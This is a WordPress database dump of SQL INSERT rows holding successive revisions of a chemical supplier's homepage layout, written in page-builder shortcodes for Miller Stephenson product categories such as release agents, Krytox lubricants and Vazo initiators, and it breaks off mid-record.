INSERT INTO `wp_posts` VALUES (587, 1, '2016-08-19 14:41:00', '2016-08-19 14:41:00', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:41:00', '2016-08-19 14:41:00', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (588, 1, '2016-08-19 14:42:56', '2016-08-19 14:42:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[divider]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:42:56', '2016-08-19 14:42:56', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (589, 1, '2016-08-19 14:44:05', '2016-08-19 14:44:05', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="30px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:44:05', '2016-08-19 14:44:05', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (590, 1, '2016-08-19 14:44:26', '2016-08-19 14:44:26', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:44:26', '2016-08-19 14:44:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (591, 1, '2016-08-19 14:44:51', '2016-08-19 14:44:51', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="10px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:44:51', '2016-08-19 14:44:51', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (592, 1, '2016-08-19 14:45:12', '2016-08-19 14:45:12', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:45:12', '2016-08-19 14:45:12', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (593, 3, '2016-08-19 14:46:52', '2016-08-19 14:46:52', '', 'Vazo88', '', 'inherit', 'open', 'closed', '', 'vazo88', '', '', '2016-08-19 14:46:52', '2016-08-19 14:46:52', '', 577, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Vazo88.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (594, 1, '2016-08-19 14:49:56', '2016-08-19 14:49:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" 